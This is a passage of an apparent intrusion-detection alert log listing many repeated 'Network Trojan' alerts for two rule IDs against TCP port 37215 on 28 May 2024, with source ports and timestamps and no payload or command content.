            SID:2829579
            Source Port:57130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605154
            SID:2835222
            Source Port:49356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760068
            SID:2829579
            Source Port:56022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.128538
            SID:2829579
            Source Port:35916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936233
            SID:2829579
            Source Port:56054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.830475
            SID:2835222
            Source Port:40006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.557740
            SID:2835222
            Source Port:38592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.051821
            SID:2835222
            Source Port:35956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425954
            SID:2835222
            Source Port:60166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508073
            SID:2829579
            Source Port:46694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713310
            SID:2835222
            Source Port:56358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985444
            SID:2835222
            Source Port:37034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894229
            SID:2835222
            Source Port:48408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.749919
            SID:2835222
            Source Port:60064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.433229
            SID:2829579
            Source Port:47426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.607386
            SID:2829579
            Source Port:38818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.437116
            SID:2829579
            Source Port:34788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.751334
            SID:2835222
            Source Port:55100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773191
            SID:2829579
            Source Port:47802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078434
            SID:2835222
            Source Port:44752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.607440
            SID:2835222
            Source Port:41878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862951
            SID:2835222
            Source Port:45494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.397403
            SID:2829579
            Source Port:60532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507255
            SID:2835222
            Source Port:43876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507197
            SID:2829579
            Source Port:58424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.836046
            SID:2835222
            Source Port:50742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086479
            SID:2829579
            Source Port:38322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765849
            SID:2835222
            Source Port:44758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026831
            SID:2829579
            Source Port:44504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.883411
            SID:2835222
            Source Port:57710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963461
            SID:2829579
            Source Port:32896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.266273
            SID:2829579
            Source Port:51776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.820814
            SID:2835222
            Source Port:45332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.042802
            SID:2829579
            Source Port:55694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610162
            SID:2835222
            Source Port:52038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.230880
            SID:2835222
            Source Port:43568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309583
            SID:2835222
            Source Port:45632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704440
            SID:2835222
            Source Port:59360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.028261
            SID:2835222
            Source Port:58980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.160303
            SID:2835222
            Source Port:46404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872620
            SID:2835222
            Source Port:54084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.738095
            SID:2835222
            Source Port:35576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.616468
            SID:2835222
            Source Port:58334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.650649
            SID:2835222
            Source Port:55752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721006
            SID:2829579
            Source Port:38930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380200
            SID:2829579
            Source Port:55428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841229
            SID:2835222
            Source Port:46668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388359
            SID:2829579
            Source Port:48584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.812739
            SID:2829579
            Source Port:57066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421603
            SID:2835222
            Source Port:45120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.946297
            SID:2829579
            Source Port:54716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542488
            SID:2835222
            Source Port:39574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770913
            SID:2835222
            Source Port:52546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853247
            SID:2835222
            Source Port:55804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327566
            SID:2835222
            Source Port:54394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858251
            SID:2829579
            Source Port:34776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850627
            SID:2829579
            Source Port:60166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058390
            SID:2829579
            Source Port:33752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.488875
            SID:2835222
            Source Port:38032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312696
            SID:2829579
            Source Port:47134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450993
            SID:2829579
            Source Port:40772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459526
            SID:2829579
            Source Port:56246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541125
            SID:2835222
            Source Port:47346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506502
            SID:2829579
            Source Port:46146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542628
            SID:2835222
            Source Port:49688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868633
            SID:2829579
            Source Port:56738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.572593
            SID:2829579
            Source Port:47388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559450
            SID:2835222
            Source Port:49412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018433
            SID:2829579
            Source Port:33804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892473
            SID:2835222
            Source Port:50726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639570
            SID:2835222
            Source Port:35882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312330
            SID:2835222
            Source Port:60600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377701
            SID:2829579
            Source Port:55550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745102
            SID:2835222
            Source Port:33384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745195
            SID:2835222
            Source Port:35310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061597
            SID:2829579
            Source Port:52844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.387425
            SID:2829579
            Source Port:50118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851224
            SID:2835222
            Source Port:57234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552791
            SID:2829579
            Source Port:40142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.660772
            SID:2835222
            Source Port:59438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931683
            SID:2829579
            Source Port:58712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.759950
            SID:2829579
            Source Port:49600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.947426
            SID:2829579
            Source Port:38262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764869
            SID:2835222
            Source Port:54086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778376
            SID:2835222
            Source Port:38226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507505
            SID:2835222
            Source Port:48296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019100
            SID:2829579
            Source Port:35422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.557703
            SID:2829579
            Source Port:43500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550378
            SID:2835222
            Source Port:54850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.822860
            SID:2835222
            Source Port:37404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046198
            SID:2835222
            Source Port:51378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920226
            SID:2835222
            Source Port:43446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.441415
            SID:2835222
            Source Port:57600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.051960
            SID:2829579
            Source Port:52864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707562
            SID:2829579
            Source Port:51096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.392755
            SID:2835222
            Source Port:45618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767663
            SID:2829579
            Source Port:54354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851110
            SID:2835222
            Source Port:37648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.011293
            SID:2835222
            Source Port:60634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938232
            SID:2835222
            Source Port:33478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919535
            SID:2835222
            Source Port:50966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.047891
            SID:2835222
            Source Port:55092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691640
            SID:2835222
            Source Port:47866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776249
            SID:2835222
            Source Port:50920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442716
            SID:2835222
            Source Port:42840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533445
            SID:2829579
            Source Port:59362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031563
            SID:2835222
            Source Port:49620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905965
            SID:2829579
            Source Port:42942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330660
            SID:2835222
            Source Port:37368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810338
            SID:2829579
            Source Port:43254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778437
            SID:2829579
            Source Port:56082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.433273
            SID:2835222
            Source Port:45364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038436
            SID:2835222
            Source Port:47258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412944
            SID:2829579
            Source Port:46410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334104
            SID:2835222
            Source Port:34604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938155
            SID:2835222
            Source Port:52348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005442
            SID:2829579
            Source Port:51742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.823646
            SID:2835222
            Source Port:57892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326905
            SID:2835222
            Source Port:39620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843215
            SID:2829579
            Source Port:35828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.664037
            SID:2829579
            Source Port:59742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.698289
            SID:2835222
            Source Port:49586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922637
            SID:2835222
            Source Port:53190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343108
            SID:2835222
            Source Port:60126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445145
            SID:2829579
            Source Port:39308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931930
            SID:2835222
            Source Port:37418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892548
            SID:2829579
            Source Port:41092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737881
            SID:2835222
            Source Port:48164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.015524
            SID:2829579
            Source Port:41980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860596
            SID:2829579
            Source Port:55782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070222
            SID:2835222
            Source Port:49368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058890
            SID:2829579
            Source Port:40278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862969
            SID:2835222
            Source Port:41672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.766537
            SID:2829579
            Source Port:37608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.672915
            SID:2835222
            Source Port:52716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893271
            SID:2829579
            Source Port:37704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934714
            SID:2829579
            Source Port:58692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827940
            SID:2829579
            Source Port:46228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.904951
            SID:2835222
            Source Port:58432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321159
            SID:2829579
            Source Port:56666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714602
            SID:2835222
            Source Port:51874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865489
            SID:2835222
            Source Port:36396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887187
            SID:2835222
            Source Port:54182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939021
            SID:2829579
            Source Port:44422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651269
            SID:2835222
            Source Port:47514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.532301
            SID:2835222
            Source Port:49024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775566
            SID:2835222
            Source Port:32942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930051
            SID:2829579
            Source Port:39766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828916
            SID:2835222
            Source Port:51744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936226
            SID:2835222
            Source Port:36302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849406
            SID:2835222
            Source Port:33032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807962
            SID:2829579
            Source Port:60760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766315
            SID:2829579
            Source Port:39180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883220
            SID:2829579
            Source Port:57066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870044
            SID:2835222
            Source Port:48188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.451462
            SID:2829579
            Source Port:59400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841488
            SID:2835222
            Source Port:44546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033347
            SID:2829579
            Source Port:48896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715648
            SID:2829579
            Source Port:43568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.910663
            SID:2829579
            Source Port:46476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963481
            SID:2835222
            Source Port:57262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047916
            SID:2835222
            Source Port:60758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.280323
            SID:2829579
            Source Port:39840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382116
            SID:2829579
            Source Port:35078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.951474
            SID:2835222
            Source Port:58772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953865
            SID:2835222
            Source Port:60976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.873542
            SID:2835222
            Source Port:39604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759848
            SID:2835222
            Source Port:49544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.158350
            SID:2835222
            Source Port:33006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471258
            SID:2829579
            Source Port:38102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807535
            SID:2829579
            Source Port:47730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.025196
            SID:2829579
            Source Port:59766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697335
            SID:2829579
            Source Port:60900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352206
            SID:2835222
            Source Port:40330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052742
            SID:2835222
            Source Port:36802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.960331
            SID:2835222
            Source Port:51750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777473
            SID:2835222
            Source Port:51990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912104
            SID:2835222
            Source Port:48506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717359
            SID:2835222
            Source Port:50730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.810402
            SID:2829579
            Source Port:46716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871194
            SID:2835222
            Source Port:59726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927561
            SID:2829579
            Source Port:36940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.464981
            SID:2829579
            Source Port:34484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379805
            SID:2835222
            Source Port:42468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998202
            SID:2835222
            Source Port:41758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276352
            SID:2835222
            Source Port:42396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318867
            SID:2829579
            Source Port:44644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.558080
            SID:2829579
            Source Port:45932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816812
            SID:2829579
            Source Port:58092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818235
            SID:2829579
            Source Port:37226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779210
            SID:2835222
            Source Port:54830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919587
            SID:2835222
            Source Port:45386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014594
            SID:2835222
            Source Port:40200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918709
            SID:2835222
            Source Port:53370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.190242
            SID:2835222
            Source Port:34838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.509802
            SID:2835222
            Source Port:57424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727441
            SID:2829579
            Source Port:43512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922279
            SID:2829579
            Source Port:39204
            Destination Port:37215
